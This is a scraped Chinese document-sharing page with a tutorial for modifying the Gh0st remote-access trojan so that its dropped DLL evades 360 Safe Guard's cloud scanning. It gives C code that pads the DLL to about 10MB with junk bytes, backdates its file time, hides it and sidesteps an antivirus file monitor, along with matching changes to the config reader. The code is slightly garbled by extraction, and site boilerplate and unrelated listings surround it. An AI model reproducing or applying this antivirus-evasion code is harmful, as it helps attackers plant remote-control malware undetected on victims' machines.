




已阅读5页,还剩2页未读, 继续免费阅读
版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
给Gh0st释放的dll添加垃圾附加数据过360安全卫士云查杀-360安全卫士, dll, 垃圾, 数据, 释放给Gh0st释放的dll添加垃圾附加数据过360安全卫士云查杀 在一个论坛看到一种过云查杀的思路,也就是靠增大自身文件大小从而让云查杀软件无法上传分析你的服务端,下面是这个方法在Gh0st这个远控上面的应用:一:install工程BOOL ReleaseResource(HMODULE hModule, WORD wResourceID, LPCTSTR lpType, LPCTSTR lpFileName, LPCTSTR lpConfigString) HGLOBAL hRes; HRSRC hResInfo; HANDLE hFile; DWORD dwBytes; char strTmpPathMAX_PATH; char strBinPathMAX_PATH; / 一定要跟别的区分开,GetTickCount有可能得到一样的值 GetTempPath(sizeof(strTmpPath), strTmpPath); wsprintf(strBinPath, %s%d_res.tmp, strTmpPath, GetTickCount(); hResInfo = FindResource(hModule, MAKEINTRESOURCE(wResourceID), lpType); if (hResInfo = NULL) return FALSE; hRes = LoadResource(hModule, hResInfo); if (hRes = NULL) return FALSE; hFile = CreateFile ( strBinPath, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL ); if (hFile = NULL) return FALSE; SYSTEMTIME st; memset(&st, 0, sizeof(st); st.wYear = 2004; st.wMonth = 8; st.wDay = 17; st.wHour = 20; st.wMinute = 0; FILETIME ft,LocalFileTime; SystemTimeToFileTime(&st, &ft); LocalFileTimeToFileTime(&ft,&LocalFileTime); SetFileTime(hFile, &LocalFileTime, (LPFILETIME) NULL, &LocalFileTime); WriteFile(hFile, hRes, SizeofResource(NULL, hResInfo), &dwBytes, NULL); / 写入配置 if (lpConfigString != NULL) WriteFile(hFile, lpConfigString, lstrlen(lpConfigString) + 1, &dwBytes, NULL); /给dll末尾添加垃圾附加数据以增大文件体积 int i = 0; char *szStrAdd; szStrAdd=new char1024*1024; memset(szStrAdd,.,1024*1024);/这里循环10次,释放的dll大概就是10M了,如果想把dll再弄大点,修改这里就可以了 while(i 10) WriteFile(hFile, szStrAdd, lstrlen(szStrAdd), &dwBytes, NULL); i+; CloseHandle(hFile); FreeResource(hRes); / Fuck KV File Create Monitor MoveFile(strBinPath, lpFileName); SetFileAttributes(lpFileName, FILE_ATTRIBUTE_HIDDEN); DeleteFile(strBinPath); return TRUE;二:svchost工程/#define MAX_CONFIG_LEN 1024 /这句注释掉,改成下面的#define MAX_CONFIG_LEN 90000/* 这个数字大概为dll文件字节数的9/10左右就可以了,如上图,这个刚编译出来的dll文件大小为100,864字节,那么我这里把MAX_CONFIG_LEN改成100,864的9/10,就是90,000就可以了*/LPCTSTR FindConfigString(HMODULE hModule, LPCTSTR lpString) char strFileNameMAX_PATH; char *lpConfigString = NULL; DWORD dwBytesRead = 0; GetModuleFileName(hModule, strFileName, sizeof(strFileName); HANDLE hFile = CreateFile(strFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL); if (hFile = INVALID_HANDLE_VALUE) return NULL; / -MAX_CONFIG_LEN改成MAX_CONFIG_LEN,FILE_END改成FILE_BEGIN SetFilePointer(hFile, MAX_CONFIG_LEN, NULL, FILE_BEGIN); lpConfigString = new charMAX_CONFIG_LEN; ReadFile(hFile, lpConfigString, MAX_CONFIG_LEN, &dwBytesRead, NULL); CloseHandle(hFile); int offset = memfind(lpConfigString, lpString, MAX_CONFIG_LEN, 0); if (offset = -1) delete lpConfigString; return NULL; else return lpConfigString + offset; 对比分析:(360安全卫士版本为V6.2 2009-12-26测试)修改之前:用360云查杀扫描:(会提示用户上传服务端dll文件)/-修改之后:释放的dll大小为10M多,用360云查杀扫描,根本不提示用户上传,但还是会提示“存在风险!”的,这样就不怕36
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 2025辽宁省机场管理集团有限公司拟聘人员考前自测高频考点模拟试题及答案详解(夺冠)
- 2025年江西省省直事业单位招聘工作人员笔试违纪违规处理意见模拟试卷有答案详解
- 2025年度中南大学湘雅二医院招聘考前自测高频考点模拟试题及答案详解(有一套)
- 2025年大庆油田有限责任公司春季高校毕业生招聘模拟试卷及完整答案详解
- 2025河南宋城水务科技发展有限公司招聘3人模拟试卷完整答案详解
- 2025金华金开招商招才服务集团有限公司招聘5人模拟试卷及参考答案详解一套
- 2025河南郑州城建职业学院招聘模拟试卷及完整答案详解一套
- 2025内蒙古航开城市建设投资有限责任公司及子公司公开招聘考前自测高频考点模拟试题及答案详解参考
- 2025年湖州德清县卫生健康系统公开招聘卫生专业技术人员37人考前自测高频考点模拟试题及参考答案详解1套
- 2025福建省市场监督管理局直属事业单位招聘高层次人才20人考前自测高频考点模拟试题及答案详解(网校专用)
- 禁止攀爬安全课件
- 渝22TS02 市政排水管道附属设施标准图集 DJBT50-159
- 中国金融黑灰产治理研究报告2025-非法代理维权的识别标准与溯源治理505mb
- 涉密测绘成果管理制度
- 2025-2030中国汽车结构胶行业市场发展趋势与前景展望战略研究报告
- T/CHC 1005-2023破壁灵芝孢子粉
- 图像几何变换讲解
- 高一上学期《国庆假期安全教育+时间规划》主题班会课件
- 2025年铁路货装值班员(高级)职业技能鉴定参考试题库(含答案)
- 2024年单招数学函数的性质专项复习试题和答案
- 星级酒店的各类客房类型介绍
评论
0/150
提交评论